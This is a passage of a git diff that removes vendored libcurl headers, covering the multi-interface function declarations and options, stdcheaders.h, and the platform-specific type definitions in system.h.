-CURL_EXTERN CURLMcode curl_multi_add_handle(CURLM *multi_handle,
-                                            CURL *curl_handle);
-
- /*
-  * Name:    curl_multi_remove_handle()
-  *
-  * Desc:    removes a curl handle from the multi stack again
-  *
-  * Returns: CURLMcode type, general multi error code.
-  */
-CURL_EXTERN CURLMcode curl_multi_remove_handle(CURLM *multi_handle,
-                                               CURL *curl_handle);
-
- /*
-  * Name:    curl_multi_fdset()
-  *
-  * Desc:    Ask curl for its fd_set sets. The app can use these to select() or
-  *          poll() on. We want curl_multi_perform() called as soon as one of
-  *          them are ready.
-  *
-  * Returns: CURLMcode type, general multi error code.
-  */
-CURL_EXTERN CURLMcode curl_multi_fdset(CURLM *multi_handle,
-                                       fd_set *read_fd_set,
-                                       fd_set *write_fd_set,
-                                       fd_set *exc_fd_set,
-                                       int *max_fd);
-
-/*
- * Name:     curl_multi_wait()
- *
- * Desc:     Poll on all fds within a CURLM set as well as any
- *           additional fds passed to the function.
- *
- * Returns:  CURLMcode type, general multi error code.
- */
-CURL_EXTERN CURLMcode curl_multi_wait(CURLM *multi_handle,
-                                      struct curl_waitfd extra_fds[],
-                                      unsigned int extra_nfds,
-                                      int timeout_ms,
-                                      int *ret);
-
- /*
-  * Name:    curl_multi_perform()
-  *
-  * Desc:    When the app thinks there's data available for curl it calls this
-  *          function to read/write whatever there is right now. This returns
-  *          as soon as the reads and writes are done. This function does not
-  *          require that there actually is data available for reading or that
-  *          data can be written, it can be called just in case. It returns
-  *          the number of handles that still transfer data in the second
-  *          argument's integer-pointer.
-  *
-  * Returns: CURLMcode type, general multi error code. *NOTE* that this only
-  *          returns errors etc regarding the whole multi stack. There might
-  *          still have occurred problems on individual transfers even when
-  *          this returns OK.
-  */
-CURL_EXTERN CURLMcode curl_multi_perform(CURLM *multi_handle,
-                                         int *running_handles);
-
- /*
-  * Name:    curl_multi_cleanup()
-  *
-  * Desc:    Cleans up and removes a whole multi stack. It does not free or
-  *          touch any individual easy handles in any way. We need to define
-  *          in what state those handles will be if this function is called
-  *          in the middle of a transfer.
-  *
-  * Returns: CURLMcode type, general multi error code.
-  */
-CURL_EXTERN CURLMcode curl_multi_cleanup(CURLM *multi_handle);
-
-/*
- * Name:    curl_multi_info_read()
- *
- * Desc:    Ask the multi handle if there's any messages/informationals from
- *          the individual transfers. Messages include informationals such as
- *          error code from the transfer or just the fact that a transfer is
- *          completed. More details on these should be written down as well.
- *
- *          Repeated calls to this function will return a new struct each
- *          time, until a special "end of msgs" struct is returned as a signal
- *          that there is no more to get at this point.
- *
- *          The data the returned pointer points to will not survive calling
- *          curl_multi_cleanup().
- *
- *          The 'CURLMsg' struct is meant to be very simple and only contain
- *          very basic information. If more involved information is wanted,
- *          we will provide the particular "transfer handle" in that struct
- *          and that should/could/would be used in subsequent
- *          curl_easy_getinfo() calls (or similar). The point being that we
- *          must never expose complex structs to applications, as then we'll
- *          undoubtably get backwards compatibility problems in the future.
- *
- * Returns: A pointer to a filled-in struct, or NULL if it failed or ran out
- *          of structs. It also writes the number of messages left in the
- *          queue (after this read) in the integer the second argument points
- *          to.
- */
-CURL_EXTERN CURLMsg *curl_multi_info_read(CURLM *multi_handle,
-                                          int *msgs_in_queue);
-
-/*
- * Name:    curl_multi_strerror()
- *
- * Desc:    The curl_multi_strerror function may be used to turn a CURLMcode
- *          value into the equivalent human readable error string.  This is
- *          useful for printing meaningful error messages.
- *
- * Returns: A pointer to a zero-terminated error message.
- */
-CURL_EXTERN const char *curl_multi_strerror(CURLMcode);
-
-/*
- * Name:    curl_multi_socket() and
- *          curl_multi_socket_all()
- *
- * Desc:    An alternative version of curl_multi_perform() that allows the
- *          application to pass in one of the file descriptors that have been
- *          detected to have "action" on them and let libcurl perform.
- *          See man page for details.
- */
-#define CURL_POLL_NONE   0
-#define CURL_POLL_IN     1
-#define CURL_POLL_OUT    2
-#define CURL_POLL_INOUT  3
-#define CURL_POLL_REMOVE 4
-
-#define CURL_SOCKET_TIMEOUT CURL_SOCKET_BAD
-
-#define CURL_CSELECT_IN   0x01
-#define CURL_CSELECT_OUT  0x02
-#define CURL_CSELECT_ERR  0x04
-
-typedef int (*curl_socket_callback)(CURL *easy,      /* easy handle */
-                                    curl_socket_t s, /* socket */
-                                    int what,        /* see above */
-                                    void *userp,     /* private callback
-                                                        pointer */
-                                    void *socketp);  /* private socket
-                                                        pointer */
-/*
- * Name:    curl_multi_timer_callback
- *
- * Desc:    Called by libcurl whenever the library detects a change in the
- *          maximum number of milliseconds the app is allowed to wait before
- *          curl_multi_socket() or curl_multi_perform() must be called
- *          (to allow libcurl's timed events to take place).
- *
- * Returns: The callback should return zero.
- */
-typedef int (*curl_multi_timer_callback)(CURLM *multi,    /* multi handle */
-                                         long timeout_ms, /* see above */
-                                         void *userp);    /* private callback
-                                                             pointer */
-
-CURL_EXTERN CURLMcode curl_multi_socket(CURLM *multi_handle, curl_socket_t s,
-                                        int *running_handles);
-
-CURL_EXTERN CURLMcode curl_multi_socket_action(CURLM *multi_handle,
-                                               curl_socket_t s,
-                                               int ev_bitmask,
-                                               int *running_handles);
-
-CURL_EXTERN CURLMcode curl_multi_socket_all(CURLM *multi_handle,
-                                            int *running_handles);
-
-#ifndef CURL_ALLOW_OLD_MULTI_SOCKET
-/* This macro below was added in 7.16.3 to push users who recompile to use
-   the new curl_multi_socket_action() instead of the old curl_multi_socket()
-*/
-#define curl_multi_socket(x,y,z) curl_multi_socket_action(x,y,0,z)
-#endif
-
-/*
- * Name:    curl_multi_timeout()
- *
- * Desc:    Returns the maximum number of milliseconds the app is allowed to
- *          wait before curl_multi_socket() or curl_multi_perform() must be
- *          called (to allow libcurl's timed events to take place).
- *
- * Returns: CURLM error code.
- */
-CURL_EXTERN CURLMcode curl_multi_timeout(CURLM *multi_handle,
-                                         long *milliseconds);
-
-#undef CINIT /* re-using the same name as in curl.h */
-
-#ifdef CURL_ISOCPP
-#define CINIT(name,type,num) CURLMOPT_ ## name = CURLOPTTYPE_ ## type + num
-#else
-/* The macro "##" is ISO C, we assume pre-ISO C doesn't support it. */
-#define LONG          CURLOPTTYPE_LONG
-#define OBJECTPOINT   CURLOPTTYPE_OBJECTPOINT
-#define FUNCTIONPOINT CURLOPTTYPE_FUNCTIONPOINT
-#define OFF_T         CURLOPTTYPE_OFF_T
-#define CINIT(name,type,number) CURLMOPT_/**/name = type + number
-#endif
-
-typedef enum {
-  /* This is the socket callback function pointer */
-  CINIT(SOCKETFUNCTION, FUNCTIONPOINT, 1),
-
-  /* This is the argument passed to the socket callback */
-  CINIT(SOCKETDATA, OBJECTPOINT, 2),
-
-    /* set to 1 to enable pipelining for this multi handle */
-  CINIT(PIPELINING, LONG, 3),
-
-   /* This is the timer callback function pointer */
-  CINIT(TIMERFUNCTION, FUNCTIONPOINT, 4),
-
-  /* This is the argument passed to the timer callback */
-  CINIT(TIMERDATA, OBJECTPOINT, 5),
-
-  /* maximum number of entries in the connection cache */
-  CINIT(MAXCONNECTS, LONG, 6),
-
-  /* maximum number of (pipelining) connections to one host */
-  CINIT(MAX_HOST_CONNECTIONS, LONG, 7),
-
-  /* maximum number of requests in a pipeline */
-  CINIT(MAX_PIPELINE_LENGTH, LONG, 8),
-
-  /* a connection with a content-length longer than this
-     will not be considered for pipelining */
-  CINIT(CONTENT_LENGTH_PENALTY_SIZE, OFF_T, 9),
-
-  /* a connection with a chunk length longer than this
-     will not be considered for pipelining */
-  CINIT(CHUNK_LENGTH_PENALTY_SIZE, OFF_T, 10),
-
-  /* a list of site names(+port) that are blacklisted from
-     pipelining */
-  CINIT(PIPELINING_SITE_BL, OBJECTPOINT, 11),
-
-  /* a list of server types that are blacklisted from
-     pipelining */
-  CINIT(PIPELINING_SERVER_BL, OBJECTPOINT, 12),
-
-  /* maximum number of open connections in total */
-  CINIT(MAX_TOTAL_CONNECTIONS, LONG, 13),
-
-   /* This is the server push callback function pointer */
-  CINIT(PUSHFUNCTION, FUNCTIONPOINT, 14),
-
-  /* This is the argument passed to the server push callback */
-  CINIT(PUSHDATA, OBJECTPOINT, 15),
-
-  CURLMOPT_LASTENTRY /* the last unused */
-} CURLMoption;
-
-
-/*
- * Name:    curl_multi_setopt()
- *
- * Desc:    Sets options for the multi handle.
- *
- * Returns: CURLM error code.
- */
-CURL_EXTERN CURLMcode curl_multi_setopt(CURLM *multi_handle,
-                                        CURLMoption option, ...);
-
-
-/*
- * Name:    curl_multi_assign()
- *
- * Desc:    This function sets an association in the multi handle between the
- *          given socket and a private pointer of the application. This is
- *          (only) useful for curl_multi_socket uses.
- *
- * Returns: CURLM error code.
- */
-CURL_EXTERN CURLMcode curl_multi_assign(CURLM *multi_handle,
-                                        curl_socket_t sockfd, void *sockp);
-
-
-/*
- * Name: curl_push_callback
- *
- * Desc: This callback gets called when a new stream is being pushed by the
- *       server. It approves or denies the new stream.
- *
- * Returns: CURL_PUSH_OK or CURL_PUSH_DENY.
- */
-#define CURL_PUSH_OK   0
-#define CURL_PUSH_DENY 1
-
-struct curl_pushheaders;  /* forward declaration only */
-
-CURL_EXTERN char *curl_pushheader_bynum(struct curl_pushheaders *h,
-                                        size_t num);
-CURL_EXTERN char *curl_pushheader_byname(struct curl_pushheaders *h,
-                                         const char *name);
-
-typedef int (*curl_push_callback)(CURL *parent,
-                                  CURL *easy,
-                                  size_t num_headers,
-                                  struct curl_pushheaders *headers,
-                                  void *userp);
-
-#ifdef __cplusplus
-} /* end of extern "C" */
-#endif
-
-#endif
diff --git a/thirdparty/curl/include/curl/stdcheaders.h b/thirdparty/curl/include/curl/stdcheaders.h
deleted file mode 100644
index 027b6f4..0000000
--- a/thirdparty/curl/include/curl/stdcheaders.h
+++ /dev/null
@@ -1,33 +0,0 @@
-#ifndef __STDC_HEADERS_H
-#define __STDC_HEADERS_H
-/***************************************************************************
- *                                  _   _ ____  _
- *  Project                     ___| | | |  _ \| |
- *                             / __| | | | |_) | |
- *                            | (__| |_| |  _ <| |___
- *                             \___|\___/|_| \_\_____|
- *
- * Copyright (C) 1998 - 2016, Daniel Stenberg, <daniel@haxx.se>, et al.
- *
- * This software is licensed as described in the file COPYING, which
- * you should have received as part of this distribution. The terms
- * are also available at https://curl.haxx.se/docs/copyright.html.
- *
- * You may opt to use, copy, modify, merge, publish, distribute and/or sell
- * copies of the Software, and permit persons to whom the Software is
- * furnished to do so, under the terms of the COPYING file.
- *
- * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
- * KIND, either express or implied.
- *
- ***************************************************************************/
-
-#include <sys/types.h>
-
-size_t fread(void *, size_t, size_t, FILE *);
-size_t fwrite(const void *, size_t, size_t, FILE *);
-
-int strcasecmp(const char *, const char *);
-int strncasecmp(const char *, const char *, size_t);
-
-#endif /* __STDC_HEADERS_H */
diff --git a/thirdparty/curl/include/curl/system.h b/thirdparty/curl/include/curl/system.h
deleted file mode 100644
index 07bbd9c..0000000
--- a/thirdparty/curl/include/curl/system.h
+++ /dev/null
@@ -1,473 +0,0 @@
-#ifndef __CURL_SYSTEM_H
-#define __CURL_SYSTEM_H
-/***************************************************************************
- *                                  _   _ ____  _
- *  Project                     ___| | | |  _ \| |
- *                             / __| | | | |_) | |
- *                            | (__| |_| |  _ <| |___
- *                             \___|\___/|_| \_\_____|
- *
- * Copyright (C) 1998 - 2017, Daniel Stenberg, <daniel@haxx.se>, et al.
- *
- * This software is licensed as described in the file COPYING, which
- * you should have received as part of this distribution. The terms
- * are also available at https://curl.haxx.se/docs/copyright.html.
- *
- * You may opt to use, copy, modify, merge, publish, distribute and/or sell
- * copies of the Software, and permit persons to whom the Software is
- * furnished to do so, under the terms of the COPYING file.
- *
- * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
- * KIND, either express or implied.
- *
- ***************************************************************************/
-
-/*
- * Try to keep one section per platform, compiler and architecture, otherwise,
- * if an existing section is reused for a different one and later on the
- * original is adjusted, probably the piggybacking one can be adversely
- * changed.
- *
- * In order to differentiate between platforms/compilers/architectures use
- * only compiler built in predefined preprocessor symbols.
- *
- * curl_off_t
- * ----------
- *
- * For any given platform/compiler curl_off_t must be typedef'ed to a 64-bit
- * wide signed integral data type. The width of this data type must remain
- * constant and independent of any possible large file support settings.
- *
- * As an exception to the above, curl_off_t shall be typedef'ed to a 32-bit
- * wide signed integral data type if there is no 64-bit type.
- *
- * As a general rule, curl_off_t shall not be mapped to off_t. This rule shall
- * only be violated if off_t is the only 64-bit data type available and the
- * size of off_t is independent of large file support settings. Keep your
- * build on the safe side avoiding an off_t gating.  If you have a 64-bit
- * off_t then take for sure that another 64-bit data type exists, dig deeper
- * and you will find it.
- *
- */
-
-#if defined(__DJGPP__) || defined(__GO32__)
-#  if defined(__DJGPP__) && (__DJGPP__ > 1)
-#    define CURL_TYPEOF_CURL_OFF_T     long long
-#    define CURL_FORMAT_CURL_OFF_T     "lld"
-#    define CURL_FORMAT_CURL_OFF_TU    "llu"
-#    define CURL_SUFFIX_CURL_OFF_T     LL
-#    define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  else
-#    define CURL_TYPEOF_CURL_OFF_T     long
-#    define CURL_FORMAT_CURL_OFF_T     "ld"
-#    define CURL_FORMAT_CURL_OFF_TU    "lu"
-#    define CURL_SUFFIX_CURL_OFF_T     L
-#    define CURL_SUFFIX_CURL_OFF_TU    UL
-#  endif
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-#elif defined(__SALFORDC__)
-#  define CURL_TYPEOF_CURL_OFF_T     long
-#  define CURL_FORMAT_CURL_OFF_T     "ld"
-#  define CURL_FORMAT_CURL_OFF_TU    "lu"
-#  define CURL_SUFFIX_CURL_OFF_T     L
-#  define CURL_SUFFIX_CURL_OFF_TU    UL
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-#elif defined(__BORLANDC__)
-#  if (__BORLANDC__ < 0x520)
-#    define CURL_TYPEOF_CURL_OFF_T     long
-#    define CURL_FORMAT_CURL_OFF_T     "ld"
-#    define CURL_FORMAT_CURL_OFF_TU    "lu"
-#    define CURL_SUFFIX_CURL_OFF_T     L
-#    define CURL_SUFFIX_CURL_OFF_TU    UL
-#  else
-#    define CURL_TYPEOF_CURL_OFF_T     __int64
-#    define CURL_FORMAT_CURL_OFF_T     "I64d"
-#    define CURL_FORMAT_CURL_OFF_TU    "I64u"
-#    define CURL_SUFFIX_CURL_OFF_T     i64
-#    define CURL_SUFFIX_CURL_OFF_TU    ui64
-#  endif
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-#elif defined(__TURBOC__)
-#  define CURL_TYPEOF_CURL_OFF_T     long
-#  define CURL_FORMAT_CURL_OFF_T     "ld"
-#  define CURL_FORMAT_CURL_OFF_TU    "lu"
-#  define CURL_SUFFIX_CURL_OFF_T     L
-#  define CURL_SUFFIX_CURL_OFF_TU    UL
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-#elif defined(__WATCOMC__)
-#  if defined(__386__)
-#    define CURL_TYPEOF_CURL_OFF_T     __int64
-#    define CURL_FORMAT_CURL_OFF_T     "I64d"
-#    define CURL_FORMAT_CURL_OFF_TU    "I64u"
-#    define CURL_SUFFIX_CURL_OFF_T     i64
-#    define CURL_SUFFIX_CURL_OFF_TU    ui64
-#  else
-#    define CURL_TYPEOF_CURL_OFF_T     long
-#    define CURL_FORMAT_CURL_OFF_T     "ld"
-#    define CURL_FORMAT_CURL_OFF_TU    "lu"
-#    define CURL_SUFFIX_CURL_OFF_T     L
-#    define CURL_SUFFIX_CURL_OFF_TU    UL
-#  endif
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-#elif defined(__POCC__)
-#  if (__POCC__ < 280)
-#    define CURL_TYPEOF_CURL_OFF_T     long
-#    define CURL_FORMAT_CURL_OFF_T     "ld"
-#    define CURL_FORMAT_CURL_OFF_TU    "lu"
-#    define CURL_SUFFIX_CURL_OFF_T     L
-#    define CURL_SUFFIX_CURL_OFF_TU    UL
-#  elif defined(_MSC_VER)
-#    define CURL_TYPEOF_CURL_OFF_T     __int64
-#    define CURL_FORMAT_CURL_OFF_T     "I64d"
-#    define CURL_FORMAT_CURL_OFF_TU    "I64u"
-#    define CURL_SUFFIX_CURL_OFF_T     i64
-#    define CURL_SUFFIX_CURL_OFF_TU    ui64
-#  else
-#    define CURL_TYPEOF_CURL_OFF_T     long long
-#    define CURL_FORMAT_CURL_OFF_T     "lld"
-#    define CURL_FORMAT_CURL_OFF_TU    "llu"
-#    define CURL_SUFFIX_CURL_OFF_T     LL
-#    define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  endif
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-#elif defined(__LCC__)
-#  define CURL_TYPEOF_CURL_OFF_T     long
-#  define CURL_FORMAT_CURL_OFF_T     "ld"
-#  define CURL_FORMAT_CURL_OFF_TU    "lu"
-#  define CURL_SUFFIX_CURL_OFF_T     L
-#  define CURL_SUFFIX_CURL_OFF_TU    UL
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-#elif defined(__SYMBIAN32__)
-#  if defined(__EABI__)  /* Treat all ARM compilers equally */
-#    define CURL_TYPEOF_CURL_OFF_T     long long
-#    define CURL_FORMAT_CURL_OFF_T     "lld"
-#    define CURL_FORMAT_CURL_OFF_TU    "llu"
-#    define CURL_SUFFIX_CURL_OFF_T     LL
-#    define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  elif defined(__CW32__)
-#    pragma longlong on
-#    define CURL_TYPEOF_CURL_OFF_T     long long
-#    define CURL_FORMAT_CURL_OFF_T     "lld"
-#    define CURL_FORMAT_CURL_OFF_TU    "llu"
-#    define CURL_SUFFIX_CURL_OFF_T     LL
-#    define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  elif defined(__VC32__)
-#    define CURL_TYPEOF_CURL_OFF_T     __int64
-#    define CURL_FORMAT_CURL_OFF_T     "lld"
-#    define CURL_FORMAT_CURL_OFF_TU    "llu"
-#    define CURL_SUFFIX_CURL_OFF_T     LL
-#    define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  endif
-#  define CURL_TYPEOF_CURL_SOCKLEN_T unsigned int
-
-#elif defined(__MWERKS__)
-#  define CURL_TYPEOF_CURL_OFF_T     long long
-#  define CURL_FORMAT_CURL_OFF_T     "lld"
-#  define CURL_FORMAT_CURL_OFF_TU    "llu"
-#  define CURL_SUFFIX_CURL_OFF_T     LL
-#  define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-#elif defined(_WIN32_WCE)
-#  define CURL_TYPEOF_CURL_OFF_T     __int64
-#  define CURL_FORMAT_CURL_OFF_T     "I64d"
-#  define CURL_FORMAT_CURL_OFF_TU    "I64u"
-#  define CURL_SUFFIX_CURL_OFF_T     i64
-#  define CURL_SUFFIX_CURL_OFF_TU    ui64
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-#elif defined(__MINGW32__)
-#  define CURL_TYPEOF_CURL_OFF_T     long long
-#  define CURL_FORMAT_CURL_OFF_T     "I64d"
-#  define CURL_FORMAT_CURL_OFF_TU    "I64u"
-#  define CURL_SUFFIX_CURL_OFF_T     LL
-#  define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  define CURL_TYPEOF_CURL_SOCKLEN_T socklen_t
-#  define CURL_PULL_SYS_TYPES_H      1
-#  define CURL_PULL_WS2TCPIP_H       1
-
-#elif defined(__VMS)
-#  if defined(__VAX)
-#    define CURL_TYPEOF_CURL_OFF_T     long
-#    define CURL_FORMAT_CURL_OFF_T     "ld"
-#    define CURL_FORMAT_CURL_OFF_TU    "lu"
-#    define CURL_SUFFIX_CURL_OFF_T     L
-#    define CURL_SUFFIX_CURL_OFF_TU    UL
-#  else
-#    define CURL_TYPEOF_CURL_OFF_T     long long
-#    define CURL_FORMAT_CURL_OFF_T     "lld"
-#    define CURL_FORMAT_CURL_OFF_TU    "llu"
-#    define CURL_SUFFIX_CURL_OFF_T     LL
-#    define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  endif
-#  define CURL_TYPEOF_CURL_SOCKLEN_T unsigned int
-
-#elif defined(__OS400__)
-#  if defined(__ILEC400__)
-#    define CURL_TYPEOF_CURL_OFF_T     long long
-#    define CURL_FORMAT_CURL_OFF_T     "lld"
-#    define CURL_FORMAT_CURL_OFF_TU    "llu"
-#    define CURL_SUFFIX_CURL_OFF_T     LL
-#    define CURL_SUFFIX_CURL_OFF_TU    ULL
-#    define CURL_TYPEOF_CURL_SOCKLEN_T socklen_t
-#    define CURL_PULL_SYS_TYPES_H      1
-#    define CURL_PULL_SYS_SOCKET_H     1
-#  endif
-
-#elif defined(__MVS__)
-#  if defined(__IBMC__) || defined(__IBMCPP__)
-#    if defined(_ILP32)
-#    elif defined(_LP64)
-#    endif
-#    if defined(_LONG_LONG)
-#      define CURL_TYPEOF_CURL_OFF_T     long long
-#      define CURL_FORMAT_CURL_OFF_T     "lld"
-#      define CURL_FORMAT_CURL_OFF_TU    "llu"
-#      define CURL_SUFFIX_CURL_OFF_T     LL
-#      define CURL_SUFFIX_CURL_OFF_TU    ULL
-#    elif defined(_LP64)
-#      define CURL_TYPEOF_CURL_OFF_T     long
-#      define CURL_FORMAT_CURL_OFF_T     "ld"
-#      define CURL_FORMAT_CURL_OFF_TU    "lu"
-#      define CURL_SUFFIX_CURL_OFF_T     L
-#      define CURL_SUFFIX_CURL_OFF_TU    UL
-#    else
-#      define CURL_TYPEOF_CURL_OFF_T     long
-#      define CURL_FORMAT_CURL_OFF_T     "ld"
-#      define CURL_FORMAT_CURL_OFF_TU    "lu"
-#      define CURL_SUFFIX_CURL_OFF_T     L
-#      define CURL_SUFFIX_CURL_OFF_TU    UL
-#    endif
-#    define CURL_TYPEOF_CURL_SOCKLEN_T socklen_t
-#    define CURL_PULL_SYS_TYPES_H      1
-#    define CURL_PULL_SYS_SOCKET_H     1
-#  endif
-
-#elif defined(__370__)
-#  if defined(__IBMC__) || defined(__IBMCPP__)
-#    if defined(_ILP32)
-#    elif defined(_LP64)
-#    endif
-#    if defined(_LONG_LONG)
-#      define CURL_TYPEOF_CURL_OFF_T     long long
-#      define CURL_FORMAT_CURL_OFF_T     "lld"
-#      define CURL_FORMAT_CURL_OFF_TU    "llu"
-#      define CURL_SUFFIX_CURL_OFF_T     LL
-#      define CURL_SUFFIX_CURL_OFF_TU    ULL
-#    elif defined(_LP64)
-#      define CURL_TYPEOF_CURL_OFF_T     long
-#      define CURL_FORMAT_CURL_OFF_T     "ld"
-#      define CURL_FORMAT_CURL_OFF_TU    "lu"
-#      define CURL_SUFFIX_CURL_OFF_T     L
-#      define CURL_SUFFIX_CURL_OFF_TU    UL
-#    else
-#      define CURL_TYPEOF_CURL_OFF_T     long
-#      define CURL_FORMAT_CURL_OFF_T     "ld"
-#      define CURL_FORMAT_CURL_OFF_TU    "lu"
-#      define CURL_SUFFIX_CURL_OFF_T     L
-#      define CURL_SUFFIX_CURL_OFF_TU    UL
-#    endif
-#    define CURL_TYPEOF_CURL_SOCKLEN_T socklen_t
-#    define CURL_PULL_SYS_TYPES_H      1
-#    define CURL_PULL_SYS_SOCKET_H     1
-#  endif
-
-#elif defined(TPF)
-#  define CURL_TYPEOF_CURL_OFF_T     long
-#  define CURL_FORMAT_CURL_OFF_T     "ld"
-#  define CURL_FORMAT_CURL_OFF_TU    "lu"
-#  define CURL_SUFFIX_CURL_OFF_T     L
-#  define CURL_SUFFIX_CURL_OFF_TU    UL
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-#elif defined(__TINYC__) /* also known as tcc */
-
-#  define CURL_TYPEOF_CURL_OFF_T     long long
-#  define CURL_FORMAT_CURL_OFF_T     "lld"
-#  define CURL_FORMAT_CURL_OFF_TU    "llu"
-#  define CURL_SUFFIX_CURL_OFF_T     LL
-#  define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  define CURL_TYPEOF_CURL_SOCKLEN_T socklen_t
-#  define CURL_PULL_SYS_TYPES_H      1
-#  define CURL_PULL_SYS_SOCKET_H     1
-
-#elif defined(__SUNPRO_C) /* Oracle Solaris Studio */
-#  if !defined(__LP64) && (defined(__ILP32) ||                          \
-                           defined(__i386) || defined(__sparcv8))
-#    define CURL_TYPEOF_CURL_OFF_T     long long
-#    define CURL_FORMAT_CURL_OFF_T     "lld"
-#    define CURL_FORMAT_CURL_OFF_TU    "llu"
-#    define CURL_SUFFIX_CURL_OFF_T     LL
-#    define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  elif defined(__LP64) || \
-        defined(__amd64) || defined(__sparcv9)
-#    define CURL_TYPEOF_CURL_OFF_T     long
-#    define CURL_FORMAT_CURL_OFF_T     "ld"
-#    define CURL_FORMAT_CURL_OFF_TU    "lu"
-#    define CURL_SUFFIX_CURL_OFF_T     L
-#    define CURL_SUFFIX_CURL_OFF_TU    UL
-#  endif
-#  define CURL_TYPEOF_CURL_SOCKLEN_T socklen_t
-#  define CURL_PULL_SYS_TYPES_H      1
-#  define CURL_PULL_SYS_SOCKET_H     1
-
-/* ===================================== */
-/*    KEEP MSVC THE PENULTIMATE ENTRY    */
-/* ===================================== */
-
-#elif defined(_MSC_VER)
-#  if (_MSC_VER >= 900) && (_INTEGRAL_MAX_BITS >= 64)
-#    define CURL_TYPEOF_CURL_OFF_T     __int64
-#    define CURL_FORMAT_CURL_OFF_T     "I64d"
-#    define CURL_FORMAT_CURL_OFF_TU    "I64u"
-#    define CURL_SUFFIX_CURL_OFF_T     i64
-#    define CURL_SUFFIX_CURL_OFF_TU    ui64
-#  else
-#    define CURL_TYPEOF_CURL_OFF_T     long
-#    define CURL_FORMAT_CURL_OFF_T     "ld"
-#    define CURL_FORMAT_CURL_OFF_TU    "lu"
-#    define CURL_SUFFIX_CURL_OFF_T     L
-#    define CURL_SUFFIX_CURL_OFF_TU    UL
-#  endif
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-/* ===================================== */
-/*    KEEP GENERIC GCC THE LAST ENTRY    */
-/* ===================================== */
-
-#elif defined(__GNUC__)
-#  if !defined(__LP64__) &&                                             \
-  (defined(__ILP32__) || defined(__i386__) || defined(__hppa__) ||      \
-   defined(__ppc__) || defined(__powerpc__) || defined(__arm__) ||      \
-   defined(__sparc__) || defined(__mips__) || defined(__sh__) ||        \
-   defined(__XTENSA__) ||                                               \
-   (defined(__SIZEOF_LONG__) && __SIZEOF_LONG__ == 4)  ||               \
-   (defined(__LONG_MAX__) && __LONG_MAX__ == 2147483647L))
-#    define CURL_TYPEOF_CURL_OFF_T     long long
-#    define CURL_FORMAT_CURL_OFF_T     "lld"
-#    define CURL_FORMAT_CURL_OFF_TU    "llu"
-#    define CURL_SUFFIX_CURL_OFF_T     LL
-#    define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  elif defined(__LP64__) || \
-        defined(__x86_64__) || defined(__ppc64__) || defined(__sparc64__) || \
-        (defined(__SIZEOF_LONG__) && __SIZEOF_LONG__ == 8) || \
-        (defined(__LONG_MAX__) && __LONG_MAX__ == 9223372036854775807L)
-#    define CURL_TYPEOF_CURL_OFF_T     long
-#    define CURL_FORMAT_CURL_OFF_T     "ld"
-#    define CURL_FORMAT_CURL_OFF_TU    "lu"
-#    define CURL_SUFFIX_CURL_OFF_T     L
-#    define CURL_SUFFIX_CURL_OFF_TU    UL
-#  endif
-#  define CURL_TYPEOF_CURL_SOCKLEN_T socklen_t
-#  define CURL_PULL_SYS_TYPES_H      1
-#  define CURL_PULL_SYS_SOCKET_H     1
-
-#else
-/* generic "safe guess" on old 32 bit style */
-# define CURL_TYPEOF_CURL_OFF_T     long
-# define CURL_FORMAT_CURL_OFF_T     "ld"
-# define CURL_FORMAT_CURL_OFF_TU    "lu"
-# define CURL_SUFFIX_CURL_OFF_T     L
-# define CURL_SUFFIX_CURL_OFF_TU    UL
-# define CURL_TYPEOF_CURL_SOCKLEN_T int
-#endif
-
-#ifdef _AIX
-/* AIX needs <sys/poll.h> */
-#define CURL_PULL_SYS_POLL_H
-#endif
-
-
-/* CURL_PULL_WS2TCPIP_H is defined above when inclusion of header file  */
-/* ws2tcpip.h is required here to properly make type definitions below. */
-#ifdef CURL_PULL_WS2TCPIP_H
-#  include <winsock2.h>
-#  include <windows.h>
-#  include <ws2tcpip.h>
-#endif
-
-/* CURL_PULL_SYS_TYPES_H is defined above when inclusion of header file  */
-/* sys/types.h is required here to properly make type definitions below. */
-#ifdef CURL_PULL_SYS_TYPES_H
-#  include <sys/types.h>
-#endif
-
-/* CURL_PULL_SYS_SOCKET_H is defined above when inclusion of header file  */
-/* sys/socket.h is required here to properly make type definitions below. */
-#ifdef CURL_PULL_SYS_SOCKET_H
-#  include <sys/socket.h>
-#endif
-
-/* CURL_PULL_SYS_POLL_H is defined above when inclusion of header file    */
-/* sys/poll.h is required here to properly make type definitions below.   */
-#ifdef CURL_PULL_SYS_POLL_H
-#  include <sys/poll.h>
-#endif
-
-/* Data type definition of curl_socklen_t. */
-#ifdef CURL_TYPEOF_CURL_SOCKLEN_T
-  typedef CURL_TYPEOF_CURL_SOCKLEN_T curl_socklen_t;
-#endif
-
-/* Data type definition of curl_off_t. */
-
-#ifdef CURL_TYPEOF_CURL_OFF_T
-  typedef CURL_TYPEOF_CURL_OFF_T curl_off_t;
-#endif
-
-/*
- * CURL_ISOCPP and CURL_OFF_T_C definitions are done here in order to allow
- * these to be visible and exported by the external libcurl interface API,
- * while also making them visible to the library internals, simply including
- * curl_setup.h, without actually needing to include curl.h internally.
- * If some day this section would grow big enough, all this should be moved
- * to its own header file.
- */
-
-/*
- * Figure out if we can use the ## preprocessor operator, which is supported
- * by ISO/ANSI C and C++. Some compilers support it without setting __STDC__
